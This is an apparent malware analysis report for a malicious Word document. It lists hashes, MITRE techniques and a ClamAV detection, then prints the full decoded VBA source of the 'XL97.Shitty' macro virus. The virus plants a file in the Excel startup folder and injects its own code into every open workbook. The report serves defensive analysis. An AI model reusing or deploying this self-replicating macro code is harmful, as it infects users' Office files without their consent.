Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 87ecbc895680b045…

MALICIOUS

Office (OLE)

27.0 KB Created: 2000-12-30 17:56:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 740331eb9027e9d1f74c8f0aac602867 SHA-1: 9f44991373022e79b10b2990264ebb9ef00bda8e SHA-256: 87ecbc895680b045343a3206b9e3225918588c5ba5acaa3c01e9fb04e0d10fb5
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The macro code attempts to create a file named 'shitty.xls' in the user's startup directory and injects its own code into it, likely to establish persistence or download a second-stage payload. The ClamAV detection 'Doc.Trojan.Quiet-5' further supports its malicious nature.

Heuristics 2

  • ClamAV: Doc.Trojan.Quiet-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Quiet-5
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1188 bytes
SHA-256: b9a37017111de40ccd152c6658eab624a3db7ae00643085a15935151ae886526
Detection
ClamAV: Doc.Trojan.Quiet-5
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'XL97.Shitty
'by CyberShadow//SMF
Private Sub Document_Close()
 On Error Resume Next
 fl = 0
 With Application.FileSearch
  .NewSearch
  .LookIn = Application.StartupPath
  .SearchSubFolders = True
  .FileName = "shitty.xls"
  .MatchAllWordForms = True
  .FileType = msoFileTypeAllFiles
  If .Execute() > 0 Then fl = 1
 End With
 If fl = 0 Then Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\shitty.xls", FileFormat:=xlNormal, AddToMru:=False
 Set shitSource = ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule
 For i = 1 To Workbooks.Count
  Set shitDest = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule
  If shitDest.Lines(1, 1) <> "'XL97.Shitty" Then
   shitDest.InsertLines 1, shitSource.Lines(1, shitSource.CountOfLines)
  End If
 Next
 If fl = 0 Then Workbooks("shitty.xls").Save: Workbooks("shitty.xls").Close
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.